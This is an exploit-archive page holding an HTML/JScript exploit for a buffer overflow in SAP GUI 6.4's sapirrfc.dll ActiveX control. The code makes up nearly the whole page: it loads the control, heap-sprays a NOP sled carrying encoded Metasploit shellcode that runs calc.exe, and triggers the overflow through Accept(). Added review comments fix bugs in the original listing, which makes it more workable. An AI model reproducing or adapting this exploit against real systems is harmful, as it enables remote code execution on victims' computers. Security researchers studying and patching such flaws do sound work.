
SAP GUI for Windows sapirrfc.dll Activex Overflow Exploit

🗓️ 10 Dec 2009 00:00:00 — Reported by RootType

SAP GUI for Windows sapirrfc.dll ActiveX Overflow Exploit

Code

                                                <html>
<title> SAP GUI for Windows sapirrfc.dll (Accept) Activex Overflow </title>
<center> 
<h1> www.Abysssec.com Public Exploit </h1>
</center>
<object classid='clsid:77F12F8A-F117-11D0-8CF1-00A0C91D9D87' id='target' />
<script>
/*
Application:                    SAP GUI for Windows,  EnjoySAP
Versions Affected:              Version 6.4 
Vendor URL:                     http://SAP.com
Bugs:                           Buffer Overflow
Exploits:                       YES
Reported:                       13.11.2008
Vendor response:                17.11.2008
Date of Public Advisory:        08.06.2009
CVE-number:                     
Discovery :                         Alexander Polyakov
				Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Exploit : www.Abysssec.com 

Note : this is a really simple exploit I wrote a few months ago; there is no point in keeping it private.

For more Information visit www.abysssec.com

Mail : [email protected]

=========================================================================================================
References:
***********
SAP note 1286637

https://service.sap.com/sap/support/notes/1286637
==========================================================================================================


*/
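function spary(count) {
  // Heap-spray helper ("spary" is the original listing's spelling; the name is
  // kept so the trigger code that calls it keeps working).  Builds `count`
  // copies of a 0x40000-unit string made of %u9090 padding followed by the
  // payload and returns them in an array.
  //
  // The listing drives an ActiveX control, i.e. an IE-era JScript engine, so
  // ES3 syntax (var, no default parameters, no String.prototype.repeat) is
  // kept on purpose.
  //
  // count  - number of spray strings to allocate; defaults to the original 1000.
  // return - the array of spray strings.  The original held this array only in
  //          a local, which becomes unreachable (collectable) as soon as the
  //          function returns; returning it lets the caller keep a reference.
  var copies = (typeof count === "number") ? count : 1000;

  // Payload exactly as given in the original listing.  Per its own comment:
  // Metasploit win32_exec, EXITFUNC=seh, CMD=c:\windows\system32\calc.exe,
  // Size=378 bytes, Alpha2 encoder (378 bytes = 189 UTF-16 units here).
  var shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
                           "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
                           "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
                           "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
                           "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
                           "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
                           "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
                           "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
                           "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
                           "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
                           "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
                           "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
                           "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
                           "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
                           "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
                           "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
                           "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
                           "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
                           "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
                           "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
                           "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
                           "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
                           "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
                           "%u314e%u7475%u7038%u7765%u4370");

  // Seed of the padding sled: two %u9090 units.
  var bigblock = unescape("%u9090%u9090");
  // NOTE(review): the original comment said "IE uses 0x20 headersize" but the
  // value actually used is decimal 20.  Kept as-is because changing it shifts
  // the whole block layout; confirm which value the target build needs.
  var headersize = 20;
  // Units reserved at the top of each allocation: header plus payload length.
  // The original read `shellcode1.length` here, a name that does not exist,
  // so the function threw a ReferenceError before spraying anything.
  var slackspace = headersize + shellcode.length;

  // Grow the sled by doubling until it can cover the slack space.
  while (bigblock.length < slackspace) bigblock += bigblock;
  // fillblock: exactly `slackspace` units of sled, appended after every doubling step below.
  var fillblock = bigblock.substring(0, slackspace);
  // block: the sled with the slack space taken off; grown to the target size below.
  var block = bigblock.substring(0, bigblock.length - slackspace);
  // Double the block (plus one fillblock) until block + slackspace reaches 0x40000 units.
  while (block.length + slackspace < 0x40000) block = block + block + fillblock;

  // Allocate the spray: `copies` strings, each the sled followed by the payload.
  // `var i` -- the original used an undeclared loop index (implicit global).
  var memory = [];
  for (var i = 0; i < copies; i++) {
    memory[i] = block + shellcode;
  }
  return memory;
}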

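// Trigger: hand the vulnerable Accept() method a 40000-unit argument made of
// 0x0D characters, then run the spray helper defined above.  The listing does
// not say so, but a 0x0D-filled buffer next to a 0x40000-sized spray is
// presumably meant to redirect control to 0x0D0D0D0D inside the sprayed heap.
// NOTE(review): the original calls Accept *before* spary(); the heap normally
// has to be sprayed before the overflow redirects control into it, so this
// order looks reversed -- verify against the target before relying on it.
// ES3 syntax is kept on purpose (IE-era JScript engine).
var buffer = new Array(40001).join(unescape("%0D")); // 40000 x "\r" in one allocation instead of 40000 concatenations
target.Accept(buffer); // the original had VBScript-style `target.Accept buffer`, which is a JavaScript syntax error
spary();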
</script>
</html>	
                              
